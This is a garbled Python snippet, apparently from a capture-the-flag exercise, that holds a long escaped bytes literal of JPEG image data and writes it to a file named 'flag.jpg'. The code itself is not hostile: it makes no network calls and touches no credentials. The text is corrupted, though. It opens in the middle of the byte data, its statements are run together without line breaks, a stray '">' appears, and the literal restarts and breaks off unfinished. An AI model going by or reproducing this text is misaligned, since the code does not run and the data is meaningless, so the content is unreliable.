\x98\x14\x87\xde\xc9\xda:\x8c<\xa2*\xdc4[\x12\xd5[[\xa0\xf2\x03\xbb\x05\x80*\xcd\xe0=\xf0eN\x8b\xfd\xde\xd1\x84\\\xdcE\x00\xcb\tK\x0c\xe4\x9bg?\xe5\x17Q\n\x0e\xcb\xf0\x02\x1e]\x8c\xd24\xd01\x8b\x02\xa0\x0b\x13q\x18Db\x157^\\&h\x0e\xf4\xeb\xa2\x00\xe6\xce\xc4\xd2T\xcco\x0ea\x1d;y^\xf3\x9f\x15\xe0\x01\x15\xdd\xd1y}\xfc\xbdYJ\xff\x00\xebt\xc0h\x1a\xe0\x16$\xb2G\x86\xad\xc7\x88\xef^\r\xdc\xeb\xa2\x7f\xb9\xc1\x83w\xe3\xae\xa1\x93\xc3\xed\xaeB~?t\x02O\xbder\xba\xb1t5\x06/\x03\x02fJ\xc0=D\x84-\xaa\xdb\xb2\xef\xaf\xc4\xf0;\'\x87\xe9\xa2}\xb3\x04x\x0f\xcf\xda\n\x96TP\x07Ua\xbc^\xfd\xf5\x08\x83\xc2-Kh<\xfd\xe7\xf7\xe9@\x9b\x9e\x8bI\xe7\xae\xdc\xdd\xdcPC\x8b\xea\xadUh*\rJc\xba\xa1\xd7\x15\x9b\xb9\xb1&\xf9:\xcc\xfbu\x0e\xab\xfb\xaf\xd6\x0b,X\x99\x00\xe8\x15J)\x186\xeek(\x93\xbb\xe3:xt\x13\xab$?\xf4\x81\xc2,f\xf4\xc8\xc9\xeb\x7f\x80$\xfe\x94\xaf*(%\xed\\$\x0e\'\xd6\xd5\xac\x13A\xd4k\x1cZ\xcf"\x83s\xce\xf3\x84\x8d\xf7\xd0c\xe4\xc6\xa4.xT&#K\xf7\xd7\n\xb8>\xb1\x9c<q\x03\x8aF/\xf5\x08\xd3\xeer\xdf\xaeX\xa4\xf4\xe2\x8c\xc6\x97\xdd\xcd\xbb\x06\x93\xaf4\x1a<I\xf0\xd3nE\xfdA\xa6V\x15\xe6\xe0\x01\xa3\x940\x10\xda\xe7-{\xf7\xba\x02\xc1\xcb\xd6\xdd\x04\xc1\xbfk\x9b\xf6f\xeb\xb6usK\xda\xd5{\xb1\x0e\xc3\x84\xe4_1\xb2\xb4\xb8\xb3\xaf\x9a\x06!\xd5\xa6\x12\xb3\x9a\xcc\xce\x93\xef\xea\xbf\x16\xd9\x17\xe4\x0eH:\x04\xe2\x16d\x1cz\xaf\xf8\x88d\x8aH\xe3T\xad\xea$\xecR\x88\xbe\x06\xbc4\xb4\x80\xf6\x8d;\x99\xcd\x87S\xb88\x1c\xfc\x08v\xf8\x0c\x1a!\xda\xfe\xe6\xdf\x97\xf6R\x1f\xec\xf5`N\xa0\xce\xcd\x0e\x90w\xd6^8\x83\x10\xf5\xd8\xe1\xabo\xe4\xf8@\xa4\xd1\x0c\xee\xe6\xa6\xcaK\x99\x86\xcc\x07O\xaf\xa6\xf7P\x08ir\x98Y\xe1,t\xde\xbc\xab\xcdm\xb1~2\x95\x8a"\t\xee\x8e\x19o\xf3\x9d\xb0\xce\xb2\xf2\xc0R2\xe8&\xc3\xd1+;\xa3\x0c\xff\x00\x14I_\xdf~\xb2\x08n\xc6\xcc\xef\x1au(\xa4|\x1f\xc3\xe5\xa4\xc4\x7f\x0f\xc3N-\x8c\xac\xe5\xe8Y\xd5\xab\xe8\xc9U\xc8\xb3[\xa7\xfb\x13\x903R\xd1v\xcc\x01R\x93\x9b\x12Vt\x95Y\x06#-\xe4N\xa71Q\x06;\xfd0M\xc2u\x0c,*\xef\xda\xe9\xae\xf7\xa6T\xd3\x17\xfac\xe3\xa1\xd1\xac\',\xb1\xb4\xb7\xa5\xeb \r#\x1d6\n\xd4\xe7\xe8t\x15@k\xc9t\xbb\xeb=\x97p9\x9cjI\xd4\x9axT\x8bW\xc2:\x03\xf1[N\x9d\x00\x84=\x98Q\xc8?\x195\xe7\xfe\x03\x8e\x82\xb4\x178\xb6\xf6\x91\xc0\x81\xbb\xf3O\xdbqW\xa9\xeb\xa1#a\xe8\xb2C\xe6\x89R\xa5\x85@\x1a\x85\xb3\x01\xea{\xfe\xcaK\xdb\xb4\x90:O\xc7\x83\xbd\xe5oC\xa3\xf8\xa2\xdc\xc5aR\t{\xf0Ph/9:,\xf6\xfe\x83,\x1e\xcc\\\xa5\x0f\x7f\x07\xfe\xe7\xa7\xf2\\t$\xf2&\xe4\xa8{(\xa3\xa1\xbc\x7f1r\xde-\x14*\x17\xbe3\xd8X\xb7\x90\xa9\xba\xaeWJ\x83\xd6\xf8$\x88\x87\xb0\x81\xd94Rg\x81$9kB?\xae\x1f\xdaTzl\xc9u?\x10\xcc$O\xeb\xaf~rH\\\x84\xf7\xb7\x9eO\x89Y\xa3\xeb;N\xf9\xe9\xf9\xce~@\xe4\xd7\xc8\xe7\xb6p\xc4\x95X]=\x18\xadGcI\xfd[u\xd2\x8d)\xb0\xcfe\xf0\xa7r\x05\x91,HrM\xa4\xec`\xce\xf8\x9a\x99\x94S\x9f5\x81E|?#\x1a\x02H\xc4#\x81\x0b\xe7\xf7\x16>OR\xba\n\xef\x0c\xb9\xc02\xe4\xd0\x15\xd7k\x0f\x96\xb2\x1c\xa8\x8a\x8f;\xaa\xde\xe82\xd6?~\x874\xb1\xe0\x14\xa6\x924\x18\xe0\x160\xabv\x95\xed;\xe2\x8ct\rjT\xc0\\U\xeb\t\x95\x890\xa3\x05\x16\xdb\xe3?\x82\xe5\rW=++u\x14\x93\x18\x08\xdc-?\xd9pD\xb2\x8b\xa4\xb3p\xf4\x19\x00C\xdfO\xe5:\xee\xf4TH\x19K\x7f\xdc{\x92\xd3\xe8\xb9]\x07r\x12\xf6\x80\xec\xafN4\xf1,<\xb3R\x1ar}\x84\xd8\xfa\x16\xbd\x16\x172\xd8\xdd\xd5kp\x91\x05\x13\xa2,sz\x93M\xae[\x8a\n\xf1;\xa9J\x00\xb5`=MumVN\xcb\xd1\xaf\xf9\xedx\xaf\xd1Zo\x82\xbb\xd1\n\xa0:(\x05Tu2\xe7j\x7f\xb9\x83\xee\xb1P\xac\x06\x91\x1b\x12\x13K1\xff\x00\x9f\x05\x0bZ,ND\xd1\xbb|\t\xf2\x98\x81\x15\x9d\x1a\xb4D\xa8L\xd4\x00\xb4\xa27\x11\xc8\xca\xe7\xe0\x8d\xb8\xdeu\xf8\x0e:\n\xd0GX\xdb\xc1\xbc\xcfe\xdd\xe0\xda\xeb\xa1\xd7\x1e]\x10\x7f\x98\xe5\xe5Y\x98Z\x83^z\x19\xf14t}\x8e\xa6\xe7\xc3\x13\x9a\xefE\xc7\xc1\x8fw\xa0\xd2\x1c\xc8i$j\x8f\x05\x9b\x7f_3\xe0\xff\x00\xfd\xcfO\xe4\xb8\xe9s;\xef\xe6\xedBRV\x94\x82C\xb2+\x91\x89}\xb8\r\\\xfb\xcfd\xa9\x973{\xfd\xea\xf7\xd0\xad\xaaH\xc8y\x90\xf1=}\x98\xcb\xd2\xe0V\xf7\x83\xc2\x18(\xe8\x13\x16\x8a\xde\xff\x00\xbf\xbc\x9bw"\x82_Q\x83\xc8co\xe1\xf25fs\xf3\x9c\xfc\x81\xc9\x12\xa6\x93\x1e\xcc\x0f7\xa4\x92F*Aj\xa0\xefS\n\xec\x1a5\xdcrJ)\x1bp\xb4\xf8\x96\x8e?oN\xfaG\xb9\xa5^\xfb\x7f\xe83\xeds\xd0\xb0\x01\x1b\x12\xc9]\x91bK\xd8\xfa3ow=\x16\x1a\xed\xc1\xa8\xf4\x03p`\xd81$_x\xbb\xc4\xecd\xbc\xed\xecD\xddf\xde\xfa\xccZ\xeb\xd8\xf1\x06\x8a\xeeu2\xcb\xdd\x9f\xcc\xdeA\x08\xc1T\x0f\xaa\x1b}\xbd\xce6\x86Udl\x01\xba\xb0H\x97\x08\xec\xad\xee\xba\x1b`\x03\xeaB\x9e\x0f\xff\x00\xfd\x93\xf6\xcc\x0e\xdfX\xfe?\x07\x8b\xcbh~\xc3\x1fp\x0f \xdc\x08t\xb6\xe0\xbc7\x97\xf9\xbeP\x12\xf6\xa9\x8d,\xb1L\x87II\n:;\xa2\x9a\xe8&,\xe8\xd5\x15\x88\x14#-\xf5\xe9\xb5\x9b\xef\xf8\x12\xbf\x03/\xbcF\x91\x8e\xe0\xcf\xddc\xe6\xdb\x9d\xb8\xeb\xa5[\xd3\xed\xbbX\x18\x9a\xae\xefY\xd3H\xc0Y\xfe\xfd4\x8e\xd3{\xe1>\xd7y\x1b\x88\xa7\xb1\x0b\xc0\xec\x1ep\xbat[:@J\xd4o\x0c\x1e\xf5M\x02_}/\xa4TG\xf3\x8b\x80R1WKo\x10\x89d\xbe\x8d\xc1\xb0\'\x1d\xd2\x14\x1b\x81\xf6\xa1\xe0T\x8c\xe0\n\x0bn\x92\x0bV\xb5z.\xe7\xd2Z\x8b\xce\x9f\xf00\x8d\xe9\x93\x84\x18c\xfc\x910t\x85\xa2#4\xb4\xbd\xce\xff\x00\xbc02\\\x03\xd4H\x83\x93B5\xfbm\xfc\xfd*\xe4\xf6\xde\xf4\xdc/\xfd\x82\x03\x01\xa3\x00 "\xcb\x80\xf6\xe84\xfd\xc4\xc2\xa2\xc6\xd4T\x17M\xa5\x81\x13@Z\xc3\xff\x00\xdbI\x9fs\xa7]\x15<\xe5]p\xc2(\xce\xc5h\xa7\x02a\xa6\xc8\xfc\x97\x18\xa3\x0f\xe5\xf5\xe3\xb1=\x14V\xadU\x95\xd3\t\xd4u\xfa;"\xedv\x9d\xe8\x1a\x15W\xcd\xf5\xa0\xc9\x06}]\x06\xc33\xdbO\n\x98\xc8\x95\xd8 \t\x884\x0e\x84\x1e\xee\x03\xba\x1b.RX\xdfB\xd3\x1e\\\xd9\xa5\xb4ND\x80\xe3XT\xa4Z\xb2\xfd\x98\xe5g\xd9\xa9\x96x\x89\x9b\x8d\xc5\xb2bQ|\x0f\xe0`\xb5m\xb0\x05\xac\xc4\xe3\xfcH\xe84\x0bY0LSi\xd8XW(\xa4a:\xf3a\xf5Q\tR\xca\xc28\x08\x0e\xddE\x1b\xa6\x8c\x9a\xc4\xb8b\'\x91) \x97\xea0\xdd\xc6_\x00\xb3\xc553l\xbe\x1f\xc8A\xcc\xf0\xed\x00U_\xd9\xc4@\x8a\xad\xaf\x89J\x88\xaa\xb8h\xe5\xa9\xba[\x9b[`\x0b\xdb\x04\xbd\xd6&\x87g\x05f8\xe4\xdf\xdbR<\xab\x1e\x01I)*%\x914q\xf1\xecl\x03\x05\x94\xdf\x0e\xe0\x81V\xd9`]\xc7\x1b\\w\xf0\x00)9\xfaz\xb8\xefrh\xd5\xf3sa\xd1\x12#\xb8}\xab\xb6\x862\xe7xZ\xa9\xa9\xa3\x03\xbbl\xc1\xba\x9c\xd6\xae\xa1\xd3\xde&\xeb\xeaKb\x15\x0e1:0\x0cs\x04+(\x98a\xff\x00+\x83\xb4\x16=\xfc<0\xe9\xdba\x0b\xe6\xa0\xb5\xcd\x1c\x01\xd0\x08\xf6\xcd\\"\xb3z\x97\x03\x00\xec\x12\xa5{\xd9YP\x15\xc4\x07q\x8c\t\x9c\xc3km\x04A\x11\x82\x9c\xff\x00\xa1z9\x85\x9e*P\x87\xd1\x0e\x02\xb4\x0c\x9e\x81n-$\xf8\xbc\x95\xd7y\xe4qS4\xd5\xea\xa5\x1d\x82s\x89\xd5\x88\xa5\xc5\x14\x89\x84H\xaf\xc7\x93\x92\x9a\xab h\tFv5\x01\x15\xd5J\xa0\x8a\xd8\x0c\x03J\x0c\xfeN\xad#J7liV\x86\xc6\x94\x12\x88.\x02\xd3Q\x9e\xa1\xbc\xba\xe8Sl\xe9\xda\xd5\x9al=\xdb\xfd\xc8\x85\xaa\xdd\xd80\xaeJW\xdc\xd7N\x9eV\xa1\xad<\xe5\x16\xe4+k\x04shi\x1a\xd2\x81\xaf\xc2\x9d\xa0\xa3A\x19\xd8 \xd2Z\x15:\xf6J\x87\x0b\n\x92s\xa4rO\x83\xb0\xbe\xce\x94x7M\xde\xd5\x90"\xef_\x19=\xe8\x86UXr\x80{\x07A\x1c)\x90m\x0bV\xd9\x8f\xdf26\x97\x92\xdcgu\xd0c\xbc\xfb\r\n&*\xab!\xd09\x13\xda\xd5\xe8\xa3\xa0\xc8t\xd9\x1fm\xce\x7f\xa2\xcf\xf4Y\xfe\x8b4\xa8\xe8w\x1aSZQ\x1f\xb5:\xbaj\xd1\xdaB\xa5\x83\xc3\x00\x00!D\x0cXj\xd5\xafb\xa2Q\x94;\xb37r\x7fE\x9f\xe8\xb3\xfd\x16A\x966i\xd8\xb7\x97]\xf0\x97kV\xc5\x85\xd7\xd5&\xa7\x8e\xcb\xa8:\x89\x19$p\xb8\xb3\xbe\xad~\xf8\x98&V\xe1k\xea\xa5Z(\xb9\xa8\xbaj\xe1:\xa7e\xeca\x88(\xf2Fl\x08\xe2#\xba\xca\x88c:\xa7\x01\xc2\'-R\xb7uS\xbd\xf6\x85\x99\xcf6\xfc]\xc1?\xa2\xcf\xf4Y\xfe\x8b6d\xfa\xd4n\xaa\xcb\r\xa4\n\r\x14&\x9f\x85\x08?\xa6\x0e\x88\x07\x82Y\x10\xea$Rb\x89\xcbm\xde"\x00T`\xb8\xac\xaf\xed\xe9\xa6\xe1v\x80\x06\x8a\x1e\x11Q\xd8\x1b\xa8\x06\xf4\xdc\xa6\xd94\xa6\xd3q]\x96\xba\x85\xd8|\xcer\xab\x81\n\xcc\x8d6~\x92\xa0*\xd0e\x96\x9d\xa7:e~\x00\x1e\x05)A\xc3\xa0\xd3T\x85~\x00\x1a)\xd7\xd0\xc2UZs\x8e\xd5\x0fc\x0c7\xdfcr\xe0\x1d\xea\xc4S\xc3i\xb7\xcb\xa6+eA\xf6y%\xac\xaep%\xaf\x93\xbaVW\x06\x94[\xa2\xf6\xb4M\xb0\xcfo+\xadzae\xefvu\xfdzW\xdc\xd2\xf2\x9a\x80\xaa\xf0\x04\xa5\xd9\xb6\x85`\x03\x02?f\x9f\xe4\xc5\x1b%\xe4\x80=\xfapB\xdd\'c\xd9\xe3\xfc\x95H\xa7\x1d\xe0`N%6\xf2\xa8j\x13\xd0\xd0\xe2y(\x8fQ>\xbf\xa7\x0c\xa9\xadc\xee\xe7Y\x81\xff\x00S\x86\xe7\x7f*\xa4\n9N\xd9\xfe\xa8\x10\xed\x8a\xdc\x04b\x95\x0e\r\xfe\xecT&\xc4M\xb7?\xfcl\xdf\xff\xd9'rawdata = bytearray(rawdata)open("flag.jpg","wb").write(rawdata)">rawdata = b'\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xdb\x00\x84\x00\x06\x06\x06\x06\x07\x06\x07\x08\x08\x07\n\x0b\n\x0b\n\x0f\x0e\x0c\x0c\x0e\x0f\x16\x10\x11\x10\x11\x10\x16"\x15\x19\x15\x15\x19\x15"\x1e$\x1e\x1c\x1e$\x1e6*&&*6>424>LDDL_Z_||\xa7\x01\x06\x06\x06\x06\x07\x06\x07\x08\x08\x07\n\x0b\n\x0b\n\x0f\x0e\x0c\x0c\x0e\x0f\x16\x10\x11\x10\x11\x10\x16"\x15\x19\x15\x15\x19\x15"\x1e$\x1e\x1c\x1e$\x1e6*&&*6>424>LDDL_Z_||\xa7\xff\xc2\x00\x11\x08\x02\xd0\x05\x00\x03\x01"\x00\x02\x11\x01\x03\x11\x01\xff\xc4\x002\x00\x01\x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x06\x03\x04\x07\x02\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\xff\xda\x00\x0c\x03\x01\x00\x02\x10\x03\x10\x00\x00\x02\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xec\xf0\x90\xccD\xa5\xf1\x11\xac\xb8\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xeb\xd4\xf1\xa7\'\xe8\x80\x01\xf3B@V1\xd9\xa0\x0c\x01@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1e\xbc\xcf\x19v\x04\x00\x00\x00c\xc8+Xlu\xe5\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1fM\xe9\xccYP\x00\x00\x00\x00\x11r\x9eJ\xb36\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x84}\x88\xd9b\xd2I$\x0e\x02\xc7\xe2\x1f\xdc\xb2\x7f#\xbe\x92\x1fc\xbe\x12y!\xfe\x13_k\x99\x12}\x15\xbdZ\x90\xd6\x8a\xca\xf9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19w\xe2\xc7\xaf \xd9\xd6\xc9\x1b\xf8\xf4\x04\x96X\x8fD\xae-\x0f\x06\xff\x00\xb8\xd1#\x1d\x97\xc9\xe3\xef\xc5o\xe3\xd4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xf7!\x89\xb7\xaf\x1e\x05\x00\x00\x07\xd9H\x8af\xc7^@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\xd8\xb7d\xf9\xf4\xac\xf3\x95\xebV7Z\xd6\xb8%\xaaI\xcc%\x8a\x8c\xb4,\xa7\xe6\xb5\xfcH\xecr\xb0k\x1a:s\xc1\x83{T\xc6\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xce\t\x13\x13\xcf\xb4\xf9`\xaf\xedgVG\xcf\xbc\xfa\x00>\x9f\x01\xf2\xaf-\t\xbec\xe6\xf3\xf3NGL\xc4\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xcb\x97SvSI\xa9\xad\xad%\xa2yd\x1b\xf3uM\xdcny\x14\x96U\x14%u4\xa3\xac\xf1\xe7\xdbx\xc7\xef\xe6\xf1\xb9\xa8\x10-\xed\\\xdcc4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x1a\xfb\x9b\x9b\x03\xdb\x80@\x00\x00\x00\x00\x00\x00\x01c\xbcf\xc3\xe0\xd8J\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03c^GS\xd8\xf7`\x10\x00\x07\xd3\xe3og\x16-\'\xa6`\x1b\x80\x00\x00\xf4h`\x9e\x81\xf9\xfd\x01@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xcbc\x8e\x94H\x9f\x991\xfb\xf9\x85\x00\x02^*\xcb\xc6\xfa\xf7\x97\xd7\x97z\xf8\xf71\x15\xdd9\xe8\x1ff\x03\xa4\x00\x06l;X\xbb\x95\xfb\x0e\x9f\x87p\x02\xd0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xaf2D\xb7\xb14u\xb7\xb4}\x98\x0e\x90\x00>\xd8\xab\x9b\x1c\xed\xab\xecn\xe7\x93y\xb1\xe3\x8f<C\xfb\xf1\xec\xe6\x1b\x00\x02B>S\x86\xbd\x8f6\xab\x9a\xf3P\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb1\xc2X\xd0\x0cq\x92\xd1~\x9c\xf9\x1d\xf2\x00\x00=\xf8\x1e\xbc\x80( \x00{\x94\x8f\x90\xf2\xe88\xeb\xcdb\xd3\x08\xb1\xe0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$&\xeb\xd6\x14\x01\x1d#\x8b\xa4\x8d{\xf1\xec\xc0\x00\x00\x00\x00\x00\x00\xcd\x19\xf6\xbc\xfa\xf1t\x0c\x91R\xb0\xa4pP\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x015\n-h\r\x82_\x0cw\x8dL\xbeu^\x9c\xed5Vm5F\xd3W\xe1\xb6\xd5F\xd3U[MQ\xb4\xd5\x1bMQ\xb7\xebI,\xff\x00\xa8\x87\x93R\xe8\x8c$\x94\x03\xe2\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1b\xde\x88\xf4\x80\x8fHj\x18\x80\x00\x00\x00,%y3\xec\x83\\\xea\xe6\xa1\xb2k%4\xcdv\xef\xa3A #\xd2\x02=\xb9\x90\x8fH\x08\xf4\x84x\xfb\xd0\xe2\xcay\x90\xc6\x99\xd44[cP\x03\xe9\xf1 #\xd2\x02=!\xe0\xd2[*\xa7\x90\x00e\xdb#\xd2\x1af0\x00\x00\xfa|H\x08\xf6\xe6\xb1\xe1 #\xc0\x01\xbb\xec\x8fH`5\x80\x00\x00\x00$\x08\xf4\x87\xc3A\x93\x18\x00\x03|\xd0Hj\x18\x99\xb6\x88\xf6\xf6\x88\x00\x04\x80\x8fH\x08\xf6\xd6\xa8\x00\xcabMx"\x1e\xbc\x80\x002\x98\x93Z&\x9bs\xc1\xad\xf7\xd7D9\xc2\xd5U\x00\x00\x00\x00\x03\xa5\xfb\x8f\xad\x97\xbf\x1e\xeb%\x9a\x8ba\x89+.\x83\xb4sE\xce\x9cy]\xb5\xca\x8a\xfb\x1aU\x17\xace\'\xa2Qn\x07\x88\x9c\xb1\xc7@\xe7\xdd\x07\x9f\x19\xefX}\x9e\xdc\xd6\xealn\xe9y6sQ\xaf&\x1c\xd4\xf9\xf3^f\x81\x7f1\xf9\xae\xc1\x1d\x17\x97Z\xab\x07N\xe6}3\x9c\x1a}#\x9f\xf4\xb1\x89@:\x04V-R\xa4\x9d\xb1\x14\x0c\xd6\x8f\x05\xab\x0e\x1a\x99x\xc5\x96\x92]\xa9\xd6HB\xcf\xcd\xad\xf4\xb3\x08\x00\x96\xbf\xf2\xae\x92ns\xcb\x9d\x10\xd5^\xf5\x8aj\xf1I<\x81\x97\x10\xea~\xa8\xf7\x82\x1e\x9di\xa8\x9d7\x1eZI\x03\xf2N\xd4P\x97\xca\xa1o\x95\xa5]L\x19\xf9\xed\xc4\x8b\xa7\xf4Z\xb1\x06\xbd`)\x8b\x8e\xc9Ef\xc2\x00\xe9\xfc\xc2\xd8Zp\xe6\xe6\'N\xa7M\xcb\x1c\xa95h9\xeb\xa5\xc3\x14\xde\x9d\xcc\xad\xa5\x9e\x1e`Q\xef\x14\xaby\xaf\xce,qF\x8a\xf5\x8c\xa4\xafZ\xa4\xfej\xad\xa8\xd6\xd8\xe7\xb2d\xad\x16zh\xa3\xad\xdb\xe5K\xa0\xc6K\x9f>\xf3\xd9\xa2w\x9d\xf4\xfa\xf9J^\xa2\x8a\xd2\xf2)}*\x87\xd0\x86\x1ctC\xa1@\xecE\x15\x8b\x1dr\xd0K\xd0:\';\x00\x00\x00\x00\x01\x97\x16S\xa8Vl\xd5\x92\xa1\xb5\xabe7\xf3\xcdD\x92\xd4;\xe5\x1c\xb2\xc8\xc1\xcb\x1a\x12\xf5;a\x03=E\xbd\x14{\x8d>\xd4h\xd6\xac\xb5\xa3\xa0P\xef\x9c\xfc\xe8\